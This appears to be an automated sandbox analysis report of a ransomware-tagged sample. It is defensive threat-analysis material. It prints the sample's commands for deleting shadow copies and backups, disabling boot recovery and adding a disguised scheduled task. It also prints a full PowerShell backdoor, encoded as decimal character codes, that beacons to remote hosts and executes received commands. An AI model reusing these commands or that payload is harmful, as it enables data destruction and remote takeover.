Malware Analysis Report

2025-08-05 15:05

Sample ID 221009-lkw3ksggb6
Target 833f918990b8e9f6d8b7d7ffc7dd8766716e8f80009eedb5d3e595655cf9268b.zip
SHA256 833f918990b8e9f6d8b7d7ffc7dd8766716e8f80009eedb5d3e595655cf9268b
Tags
evasion ransomware
score
9/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
9/10

SHA256

833f918990b8e9f6d8b7d7ffc7dd8766716e8f80009eedb5d3e595655cf9268b

Threat Level: Likely malicious

The file 833f918990b8e9f6d8b7d7ffc7dd8766716e8f80009eedb5d3e595655cf9268b.zip was found to be: Likely malicious.

Malicious Activity Summary

evasion ransomware

Modifies boot configuration data using bcdedit

Deletes shadow copies

Deletes System State backups

Deletes backup catalog

Deletes system backups

Drops file in Windows directory

Checks SCSI registry key(s)

Creates scheduled task(s)

Interacts with shadow copies

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-10-09 09:36

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-10-09 09:36

Reported

2022-10-09 09:38

Platform

win7-20220812-en

Max time kernel

43s

Max time network

49s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\74a441ef34775d4cdec676e06a669fa0594a8455a1d31f9d2a52e6ae5bc3aaba.ps1

Signatures

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Deletes System State backups

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Deletes system backups

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl C:\Windows\system32\wbadmin.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl C:\Windows\system32\wbadmin.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl C:\Windows\system32\wbadmin.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl C:\Windows\system32\wbadmin.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl C:\Windows\system32\wbadmin.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl C:\Windows\system32\wbadmin.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2012 wrote to memory of 1488 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 2012 wrote to memory of 1488 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 2012 wrote to memory of 1488 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 2012 wrote to memory of 1756 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bcdedit.exe
PID 2012 wrote to memory of 1756 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bcdedit.exe
PID 2012 wrote to memory of 1756 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bcdedit.exe
PID 2012 wrote to memory of 848 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bcdedit.exe
PID 2012 wrote to memory of 848 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bcdedit.exe
PID 2012 wrote to memory of 848 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bcdedit.exe
PID 2012 wrote to memory of 1204 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\wbadmin.exe
PID 2012 wrote to memory of 1204 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\wbadmin.exe
PID 2012 wrote to memory of 1204 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\wbadmin.exe
PID 2012 wrote to memory of 1344 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\wbadmin.exe
PID 2012 wrote to memory of 1344 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\wbadmin.exe
PID 2012 wrote to memory of 1344 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\wbadmin.exe
PID 2012 wrote to memory of 1524 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\wbadmin.exe
PID 2012 wrote to memory of 1524 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\wbadmin.exe
PID 2012 wrote to memory of 1524 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\wbadmin.exe
PID 2012 wrote to memory of 1164 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\vssadmin.exe
PID 2012 wrote to memory of 1164 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\vssadmin.exe
PID 2012 wrote to memory of 1164 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\vssadmin.exe
PID 2012 wrote to memory of 1616 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\wscript.exe
PID 2012 wrote to memory of 1616 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\wscript.exe
PID 2012 wrote to memory of 1616 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\wscript.exe
PID 2012 wrote to memory of 1628 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2012 wrote to memory of 1628 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2012 wrote to memory of 1628 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\74a441ef34775d4cdec676e06a669fa0594a8455a1d31f9d2a52e6ae5bc3aaba.ps1

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /TN WindowsApplicationService /sc DAILY /st 00:00 /f /RI 19 /du 23:59 /TR %PUBLIC%\Libraries\WindowsIndexingService.vbs

C:\Windows\system32\bcdedit.exe

"C:\Windows\system32\bcdedit.exe" /set yifydxwzg bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

"C:\Windows\system32\bcdedit.exe" /set yifydxwzg recoveryenabled no

C:\Windows\system32\wbadmin.exe

"C:\Windows\system32\wbadmin.exe" delete catalog -quiet

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Windows\system32\wbadmin.exe

"C:\Windows\system32\wbadmin.exe" delete systemstatebackup

C:\Windows\system32\wbadmin.exe

"C:\Windows\system32\wbadmin.exe" delete backup

C:\Windows\system32\vssadmin.exe

"C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\wscript.exe

"C:\Windows\system32\wscript.exe" %PUBLIC%\Libraries\WindowsIndexingService.vbs

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c =[string][System.Text.Encoding]::ASCII.GetString 36 100 97 99 121 122 122 97 118 105 104 32 61 32 36 101 110 118 58 80 85 66 76 73 67 32 43 32 34 92 76 105 98 114 97 114 105 101 115 34 10 105 102 32 40 45 110 111 116 32 40 84 101 115 116 45 80 97 116 104 32 36 100 97 99 121 122 122 97 118 105 104 41 41 32 123 32 109 100 32 36 100 97 99 121 122 122 97 118 105 104 59 32 125 10 36 104 118 121 102 97 118 100 32 61 32 36 100 97 99 121 122 122 97 118 105 104 32 43 32 34 92 87 105 110 100 111 119 115 73 110 100 101 120 105 110 103 83 101 114 118 105 99 101 46 118 98 115 34 59 10 36 119 119 115 100 100 100 97 99 121 99 32 32 61 32 34 49 48 48 49 46 51 34 59 10 36 98 116 101 100 115 118 97 116 102 97 32 61 32 36 101 110 118 58 116 101 109 112 32 43 32 34 92 65 70 88 53 48 48 53 56 46 116 109 112 34 59 10 36 122 102 116 97 115 106 101 32 32 61 32 36 100 97 99 121 122 122 97 118 105 104 32 43 32 34 92 116 104 117 109 98 99 97 99 104 101 95 54 52 46 100 98 34 59 10 36 109 121 117 114 108 112 111 115 116 32 61 32 36 102 97 108 115 101 59 10 36 115 102 118 104 120 117 100 101 32 61 32 34 119 34 59 10 10 102 117 110 99 116 105 111 110 32 105 97 109 119 111 114 107 50 123 32 115 99 32 45 80 97 116 104 32 36 98 116 101 100 115 118 97 116 102 97 32 45 86 97 108 117 101 32 36 40 71 101 116 45 68 97 116 101 41 59 32 125 59 10 102 117 110 99 116 105 111 110 32 100 121 97 120 117 98 116 105 106 118 40 32 36 119 103 104 102 117 99 101 102 117 32 41 123 10 32 32 105 102 40 32 36 119 103 104 102 117 99 101 102 117 32 45 109 97 116 99 104 32 39 79 117 116 79 102 77 101 109 111 114 121 69 120 99 101 112 116 105 111 110 39 32 41 123 10 32 32 32 32 114 105 32 45 80 97 116 104 32 36 98 116 101 100 115 118 97 116 102 97 32 45 70 111 114 99 101 59 10 32 32 32 32 103 101 116 45 112 114 111 99 101 115 115 32 112 111 119 101 114 115 104 101 108 108 42 32 124 32 115 116 111 112 45 112 114 111 99 101 115 115 59 10 32 32 32 32 101 120 105 116 59 10 32 32 125 59 10 125 10 10 102 117 110 99 116 105 111 110 32 115 101 110 100 112 111 115 116 50 40 32 36 119 103 104 102 117 99 101 102 117 32 41 123 10 32 32 105 102 40 32 33 36 109 121 117 114 108 112 111 115 116 32 41 123 32 114 101 116 117 114 110 32 36 102 97 108 115 101 59 32 125 59 10 32 32 36 105 115 106 100 97 121 117 104 120 101 32 61 32 78 101 119 45 79 98 106 101 99 116 32 83 121 115 116 101 109 46 78 101 116 46 87 101 98 67 108 105 101 110 116 59 10 32 32 36 105 115 106 100 97 121 117 104 120 101 46 67 114 101 100 101 110 116 105 97 108 115 32 61 32 91 83 121 115 116 101 109 46 78 101 116 46 67 114 101 100 101 110 116 105 97 108 67 97 99 104 101 93 58 58 68 101 102 97 117 108 116 67 114 101 100 101 110 116 105 97 108 115 59 10 32 32 36 105 115 106 100 97 121 117 104 120 101 46 72 101 97 100 101 114 115 46 65 100 100 40 34 67 111 110 116 101 110 116 45 84 121 112 101 34 44 32 34 97 112 112 108 105 99 97 116 105 111 110 47 120 45 119 119 119 45 102 111 114 109 45 117 114 108 101 110 99 111 100 101 100 34 41 59 10 32 32 36 105 115 106 100 97 121 117 104 120 101 46 69 110 99 111 100 105 110 103 32 61 32 91 83 121 115 116 101 109 46 84 101 120 116 46 69 110 99 111 100 105 110 103 93 58 58 85 84 70 56 59 10 32 32 116 114 121 123 10 32 32 32 32 36 100 104 104 119 121 120 118 121 32 61 32 36 105 115 106 100 97 121 117 104 120 101 46 85 112 108 111 97 100 83 116 114 105 110 103 40 32 36 109 121 117 114 108 112 111 115 116 44 32 34 108 61 34 43 91 67 111 110 118 101 114 116 93 58 58 84 111 66 97 115 101 54 52 83 116 114 105 110 103 40 91 84 101 120 116 46 69 110 99 111 100 105 110 103 93 58 58 85 84 70 56 46 71 101 116 66 121 116 101 115 40 32 40 32 34 118 61 36 119 119 115 100 100 100 97 99 121 99 38 103 117 105 100 61 36 120 100 115 118 117 118 106 120 122 120 38 34 32 43 32 36 119 103 104 102 117 99 101 102 117 32 41 32 41 32 41 32 41 59 10 32 32 32 32 36 100 104 104 119 121 120 118 121 32 61 32 91 115 116 114 105 110 103 93 91 83 121 115 116 101 109 46 84 101 120 116 46 69 110 99 111 100 105 110 103 93 58 58 65 83 67 73 73 46 71 101 116 83 116 114 105 110 103 40 91 83 121 115 116 101 109 46 67 111 110 118 101 114 116 93 58 58 70 114 111 109 66 97 115 101 54 52 83 116 114 105 110 103 40 32 36 100 104 104 119 121 120 118 121 32 41 32 41 59 10 32 32 32 32 105 102 40 32 33 36 115 102 118 104 120 117 100 101 32 41 123 32 114 101 116 117 114 110 32 36 102 97 108 115 101 59 32 125 10 32 32 32 32 105 102 40 32 36 101 119 106 97 121 120 97 101 119 117 32 45 101 113 32 36 100 104 104 119 121 120 118 121 46 83 117 98 115 116 114 105 110 103 40 48 44 49 54 41 32 41 123 10 32 32 32 32 32 32 114 101 116 117 114 110 32 36 100 104 104 119 121 120 118 121 46 83 117 98 115 116 114 105 110 103 40 49 54 44 36 100 104 104 119 121 120 118 121 46 108 101 110 103 116 104 45 49 54 41 32 59 10 32 32 32 32 125 101 108 115 101 123 10 32 32 32 32 32 32 36 115 102 118 104 120 117 100 101 32 61 32 36 102 97 108 115 101 59 10 32 32 32 32 32 32 115 101 110 100 112 111 115 116 50 32 40 34 101 114 114 111 114 61 34 32 43 32 91 67 111 110 118 101 114 116 93 58 58 84 111 66 97 115 101 54 52 83 116 114 105 110 103 40 91 84 101 120 116 46 69 110 99 111 100 105 110 103 93 58 58 85 84 70 56 46 71 101 116 66 121 116 101 115 40 32 36 100 104 104 119 121 120 118 121 32 41 32 41 32 41 59 10 32 32 32 32 125 10 32 32 125 99 97 116 99 104 123 10 32 32 32 32 100 121 97 120 117 98 116 105 106 118 32 36 95 46 69 120 99 101 112 116 105 111 110 46 77 101 115 115 97 103 101 59 10 32 32 32 32 36 115 102 118 104 120 117 100 101 32 61 32 36 102 97 108 115 101 59 10 32 32 32 32 36 105 115 106 100 97 121 117 104 120 101 46 85 112 108 111 97 100 83 116 114 105 110 103 40 32 36 109 121 117 114 108 112 111 115 116 44 32 34 108 61 34 43 91 67 111 110 118 101 114 116 93 58 58 84 111 66 97 115 101 54 52 83 116 114 105 110 103 40 91 84 101 120 116 46 69 110 99 111 100 105 110 103 93 58 58 85 84 70 56 46 71 101 116 66 121 116 101 115 40 32 40 32 34 118 61 36 119 119 115 100 100 100 97 99 121 99 38 103 117 105 100 61 36 120 100 115 118 117 118 106 120 122 120 38 101 114 114 111 114 61 115 101 110 100 112 111 115 116 50 58 34 32 43 32 36 109 121 117 114 108 112 111 115 116 43 34 58 34 43 36 100 104 104 119 121 120 118 121 32 43 34 58 34 43 32 36 95 46 69 120 99 101 112 116 105 111 110 46 77 101 115 115 97 103 101 32 41 32 41 32 41 32 41 59 10 32 32 125 59 10 32 32 114 101 116 117 114 110 32 36 102 97 108 115 101 59 10 125 59 10 10 102 117 110 99 116 105 111 110 32 122 100 105 102 102 118 97 104 115 40 32 36 121 121 102 104 103 104 119 115 32 41 123 10 32 32 36 106 119 117 115 103 104 100 32 61 32 34 104 116 116 112 58 47 47 107 97 109 97 46 109 105 97 108 101 101 107 97 46 99 111 109 47 34 59 10 32 32 34 104 101 101 34 44 34 120 117 49 34 44 34 104 115 48 34 44 34 106 100 53 34 44 34 109 113 102 34 32 124 32 37 123 32 36 106 119 117 115 103 104 100 32 43 61 32 34 44 34 43 34 104 116 116 112 58 47 47 34 43 32 40 32 91 67 111 110 118 101 114 116 93 58 58 84 111 66 97 115 101 54 52 83 116 114 105 110 103 40 32 91 83 121 115 116 101 109 46 84 101 120 116 46 69 110 99 111 100 105 110 103 93 58 58 85 84 70 56 46 71 101 116 66 121 116 101 115 40 32 36 95 43 32 36 40 71 101 116 45 68 97 116 101 32 45 85 70 111 114 109 97 116 32 34 37 121 37 109 37 86 34 41 32 41 32 41 46 116 111 76 111 119 101 114 40 41 32 41 32 43 34 46 116 111 112 47 34 59 32 125 59 10 32 32 36 106 119 117 115 103 104 100 46 115 112 108 105 116 40 34 44 34 41 32 124 32 37 123 10 32 32 32 32 105 102 40 32 33 36 109 121 117 114 108 112 111 115 116 32 41 123 10 32 32 32 32 32 32 36 109 121 117 114 108 112 111 115 116 32 61 32 36 95 59 10 32 32 32 32 32 32 105 102 40 32 33 40 115 101 110 100 112 111 115 116 50 32 40 36 121 121 102 104 103 104 119 115 32 43 32 34 38 100 111 109 101 110 61 36 109 121 117 114 108 112 111 115 116 34 32 41 41 32 41 123 32 36 109 121 117 114 108 112 111 115 116 32 61 32 36 102 97 108 115 101 59 32 125 59 10 32 32 32 32 32 32 83 116 97 114 116 45 83 108 101 101 112 32 45 115 32 53 59 10 32 32 32 32 125 10 32 32 125 59 10 32 32 105 102 40 32 36 121 121 102 104 103 104 119 115 32 45 109 97 116 99 104 32 34 115 116 97 116 117 115 61 114 101 103 105 115 116 101 114 34 32 41 123 10 32 32 32 32 114 101 116 117 114 110 32 34 111 107 34 59 10 32 32 125 101 108 115 101 123 10 32 32 32 32 114 101 116 117 114 110 32 36 109 121 117 114 108 112 111 115 116 59 10 32 32 125 32 10 125 59 10 10 105 102 32 40 32 84 101 115 116 45 80 97 116 104 32 36 98 116 101 100 115 118 97 116 102 97 32 41 123 10 32 32 105 102 32 40 32 40 32 40 32 78 69 87 45 84 73 77 69 83 80 65 78 32 45 83 116 97 114 116 32 40 40 71 101 116 45 67 104 105 108 100 73 116 101 109 32 36 98 116 101 100 115 118 97 116 102 97 32 41 46 67 114 101 97 116 105 111 110 84 105 109 101 41 32 45 69 110 100 32 40 71 101 116 45 68 97 116 101 41 41 46 77 105 110 117 116 101 115 32 41 32 45 103 116 32 49 53 32 41 123 10 32 32 32 32 114 105 32 45 80 97 116 104 32 36 98 116 101 100 115 118 97 116 102 97 32 45 70 111 114 99 101 59 10 32 32 32 32 116 114 121 123 32 103 101 116 45 112 114 111 99 101 115 115 32 112 111 119 101 114 115 104 101 108 108 42 32 124 32 115 116 111 112 45 112 114 111 99 101 115 115 32 125 99 97 116 99 104 123 125 59 10 32 32 32 32 101 120 105 116 59 10 32 32 125 101 108 115 101 123 32 101 120 105 116 59 32 125 59 10 125 59 10 10 102 117 110 99 116 105 111 110 32 119 98 117 118 104 121 118 40 32 36 120 121 104 103 104 119 118 100 32 41 123 10 32 32 105 102 40 32 36 120 121 104 103 104 119 118 100 32 41 123 10 32 32 32 32 115 99 32 45 80 97 116 104 32 36 122 102 116 97 115 106 101 32 45 86 97 108 117 101 32 40 32 91 103 117 105 100 93 58 58 78 101 119 71 117 105 100 40 41 44 32 40 32 91 103 117 105 100 93 58 58 78 101 119 71 117 105 100 40 41 32 45 114 101 112 108 97 99 101 32 39 45 39 44 39 39 32 41 46 83 117 98 115 116 114 105 110 103 40 48 44 49 54 41 32 32 45 106 111 105 110 32 39 44 39 32 41 32 45 70 111 114 99 101 59 32 32 10 32 32 32 32 103 105 32 36 122 102 116 97 115 106 101 32 45 70 111 114 99 101 32 124 32 32 37 123 32 36 95 46 65 116 116 114 105 98 117 116 101 115 32 61 32 34 72 105 100 100 101 110 34 32 125 59 10 32 32 32 32 116 114 121 123 10 32 32 32 32 32 32 36 116 101 103 98 101 121 120 102 32 61 32 91 69 110 118 105 114 111 110 109 101 110 116 93 58 58 71 101 116 70 111 108 100 101 114 80 97 116 104 40 39 83 116 97 114 116 117 112 39 41 32 43 32 39 92 87 105 110 100 111 119 115 65 112 112 108 105 99 97 116 105 111 110 83 101 114 118 105 99 101 46 108 110 107 39 59 10 32 32 32 32 32 32 105 102 40 32 45 110 111 116 32 40 32 84 101 115 116 45 80 97 116 104 32 36 116 101 103 98 101 121 120 102 32 41 32 41 123 10 32 32 32 32 32 32 32 32 36 122 106 98 98 100 99 105 100 100 119 32 61 32 78 101 119 45 79 98 106 101 99 116 32 45 67 111 109 79 98 106 101 99 116 32 40 39 87 83 99 114 105 112 116 46 83 104 101 108 108 39 41 59 10 32 32 32 32 32 32 32 32 36 100 115 100 99 98 97 106 119 32 61 32 36 122 106 98 98 100 99 105 100 100 119 46 67 114 101 97 116 101 83 104 111 114 116 99 117 116 40 32 36 116 101 103 98 101 121 120 102 32 32 41 59 10 32 32 32 32 32 32 32 32 36 100 115 100 99 98 97 106 119 46 84 97 114 103 101 116 80 97 116 104 32 61 32 36 104 118 121 102 97 118 100 59 10 32 32 32 32 32 32 32 32 36 100 115 100 99 98 97 106 119 46 87 111 114 107 105 110 103 68 105 114 101 99 116 111 114 121 32 61 32 36 100 97 99 121 122 122 97 118 105 104 59 10 32 32 32 32 32 32 32 32 36 100 115 100 99 98 97 106 119 46 87 105 110 100 111 119 83 116 121 108 101 32 61 32 49 59 10 32 32 32 32 32 32 32 32 36 100 115 100 99 98 97 106 119 46 68 101 115 99 114 105 112 116 105 111 110 32 61 32 39 87 105 110 100 111 119 115 32 65 112 112 108 105 99 97 116 105 111 110 32 83 101 114 118 105 99 101 39 59 10 32 32 32 32 32 32 32 32 36 100 115 100 99 98 97 106 119 46 83 97 118 101 40 41 59 10 32 32 32 32 32 32 125 10 32 32 32 32 125 99 97 116 99 104 123 125 59 10 32 32 32 32 36 120 100 115 118 117 118 106 120 122 120 44 32 36 101 119 106 97 121 120 97 101 119 117 32 61 32 40 103 101 116 45 99 111 110 116 101 110 116 32 36 122 102 116 97 115 106 101 41 46 115 112 108 105 116 40 39 44 39 41 59 10 32 32 32 32 36 97 102 105 101 104 104 97 32 61 32 34 115 116 97 116 117 115 61 114 101 103 105 115 116 101 114 38 115 115 105 100 61 36 101 119 106 97 121 120 97 101 119 117 38 111 115 61 34 43 40 91 115 116 114 105 110 103 93 36 80 83 86 101 114 115 105 111 110 84 97 98 108 101 46 66 117 105 108 100 86 101 114 115 105 111 110 41 43 34 38 112 115 118 101 114 61 34 43 40 32 40 32 40 71 101 116 45 72 111 115 116 41 46 86 101 114 115 105 111 110 32 41 46 77 97 106 111 114 32 41 43 32 34 38 99 111 109 112 95 110 97 109 101 61 34 32 43 32 40 40 71 101 116 45 87 109 105 79 98 106 101 99 116 32 45 99 108 97 115 115 32 87 105 110 51 50 95 67 111 109 112 117 116 101 114 83 121 115 116 101 109 32 45 80 114 111 112 101 114 116 121 32 78 97 109 101 41 46 78 97 109 101 46 116 114 105 109 40 41 32 41 59 10 32 32 32 32 105 102 40 32 84 101 115 116 45 80 97 116 104 32 40 32 36 100 97 99 121 122 122 97 118 105 104 32 43 32 34 92 116 104 117 109 98 99 97 99 104 101 95 51 51 46 100 98 34 32 41 32 41 123 10 32 32 32 32 32 32 114 105 32 45 80 97 116 104 32 40 32 36 100 97 99 121 122 122 97 118 105 104 32 43 32 34 92 116 104 117 109 98 99 97 99 104 101 95 51 51 46 100 98 34 32 41 44 32 40 32 36 100 97 99 121 122 122 97 118 105 104 32 43 32 34 92 87 105 110 100 111 119 115 73 110 100 101 120 105 110 103 83 101 114 118 105 99 101 46 106 115 34 32 41 32 45 70 111 114 99 101 59 10 32 32 32 32 32 32 116 114 121 123 32 115 99 104 116 97 115 107 115 46 101 120 101 32 47 100 101 108 101 116 101 32 47 84 78 32 34 87 105 110 100 111 119 115 73 110 100 101 120 105 110 103 83 101 114 118 105 99 101 34 32 47 102 32 125 99 97 116 99 104 123 125 10 32 32 32 32 32 32 116 114 121 123 32 115 99 104 116 97 115 107 115 46 101 120 101 32 47 100 101 108 101 116 101 32 47 84 78 32 34 87 105 110 100 111 119 115 32 73 110 100 101 120 105 110 103 32 83 101 114 118 105 99 101 34 32 47 102 32 125 99 97 116 99 104 123 125 10 32 32 32 32 32 32 105 102 40 32 84 101 115 116 45 80 97 116 104 32 40 32 91 69 110 118 105 114 111 110 109 101 110 116 93 58 58 71 101 116 70 111 108 100 101 114 80 97 116 104 40 39 83 116 97 114 116 117 112 39 41 32 43 32 39 92 87 105 110 100 111 119 115 73 110 100 101 120 105 110 103 83 101 114 118 105 99 101 46 108 110 107 39 32 41 32 32 41 123 10 32 32 32 32 32 32 32 32 114 105 32 45 80 97 116 104 32 40 32 91 69 110 118 105 114 111 110 109 101 110 116 93 58 58 71 101 116 70 111 108 100 101 114 80 97 116 104 40 39 83 116 97 114 116 117 112 39 41 32 43 32 39 92 87 105 110 100 111 119 115 73 110 100 101 120 105 110 103 83 101 114 118 105 99 101 46 108 110 107 39 32 41 32 45 70 111 114 99 101 59 10 32 32 32 32 32 32 125 10 32 32 32 32 125 10 32 32 32 32 36 116 116 100 105 104 120 99 121 98 101 32 61 32 122 100 105 102 102 118 97 104 115 32 36 97 102 105 101 104 104 97 59 10 32 32 32 32 105 102 40 32 36 116 116 100 105 104 120 99 121 98 101 32 45 110 101 32 34 111 107 34 41 123 10 32 32 32 32 32 32 114 105 32 45 80 97 116 104 32 36 122 102 116 97 115 106 101 32 45 70 111 114 99 101 59 10 32 32 32 32 32 32 101 120 105 116 59 10 32 32 32 32 125 10 32 32 125 10 32 32 114 101 116 117 114 110 32 40 103 101 116 45 99 111 110 116 101 110 116 32 36 122 102 116 97 115 106 101 41 46 115 112 108 105 116 40 39 44 39 41 59 10 125 10 36 118 100 97 105 116 104 102 32 61 32 40 115 99 104 116 97 115 107 115 46 101 120 101 32 47 99 114 101 97 116 101 32 47 84 78 32 34 87 105 110 100 111 119 115 65 112 112 108 105 99 97 116 105 111 110 83 101 114 118 105 99 101 34 32 47 115 99 32 68 65 73 76 89 32 47 115 116 32 48 48 58 48 48 32 47 102 32 47 82 73 32 49 57 32 47 100 117 32 50 51 58 53 57 32 47 84 82 32 36 104 118 121 102 97 118 100 41 59 32 10 105 102 32 40 32 84 101 115 116 45 80 97 116 104 32 36 122 102 116 97 115 106 101 32 41 123 10 32 32 36 120 100 115 118 117 118 106 120 122 120 44 32 36 101 119 106 97 121 120 97 101 119 117 32 61 32 32 119 98 117 118 104 121 118 32 36 102 97 108 115 101 59 10 32 32 105 102 40 32 36 101 119 106 97 121 120 97 101 119 117 46 108 101 110 103 116 104 32 45 110 101 32 49 54 32 32 41 123 32 36 120 100 115 118 117 118 106 120 122 120 44 32 36 101 119 106 97 121 120 97 101 119 117 32 61 32 32 119 98 117 118 104 121 118 32 36 116 114 117 101 59 32 125 10 125 101 108 115 101 123 10 32 32 36 120 100 115 118 117 118 106 120 122 120 44 32 36 101 119 106 97 121 120 97 101 119 117 32 61 32 32 119 98 117 118 104 121 118 32 36 116 114 117 101 59 10 125 10 36 109 121 117 114 108 112 111 115 116 32 61 32 122 100 105 102 102 118 97 104 115 59 10 119 104 105 108 101 40 32 36 115 102 118 104 120 117 100 101 32 41 123 10 32 32 105 97 109 119 111 114 107 50 59 10 32 32 116 114 121 123 10 32 32 32 32 105 102 40 32 36 115 102 118 104 120 117 100 101 32 45 97 110 100 32 40 36 115 102 118 104 120 117 100 101 46 108 101 110 103 116 104 32 45 103 116 32 51 48 41 32 32 41 123 10 32 32 32 32 32 32 105 101 120 32 36 115 102 118 104 120 117 100 101 59 10 32 32 32 32 125 59 10 32 32 125 99 97 116 99 104 123 32 100 121 97 120 117 98 116 105 106 118 32 36 95 46 69 120 99 101 112 116 105 111 110 46 77 101 115 115 97 103 101 59 32 125 59 10 32 32 83 116 97 114 116 45 83 108 101 101 112 32 45 115 32 50 56 48 59 10 32 32 36 115 102 118 104 120 117 100 101 32 61 32 115 101 110 100 112 111 115 116 50 59 10 125 59 10 114 105 32 45 80 97 116 104 32 36 98 116 101 100 115 118 97 116 102 97 32 45 70 111 114 99 101 59 10

Network

N/A

Files

memory/2012-54-0x000007FEFB741000-0x000007FEFB743000-memory.dmp

memory/2012-55-0x000007FEF33C0000-0x000007FEF3DE3000-memory.dmp

memory/2012-56-0x000007FEF2860000-0x000007FEF33BD000-memory.dmp

memory/2012-57-0x0000000002110000-0x0000000002190000-memory.dmp

memory/1488-58-0x0000000000000000-mapping.dmp

memory/1756-59-0x0000000000000000-mapping.dmp

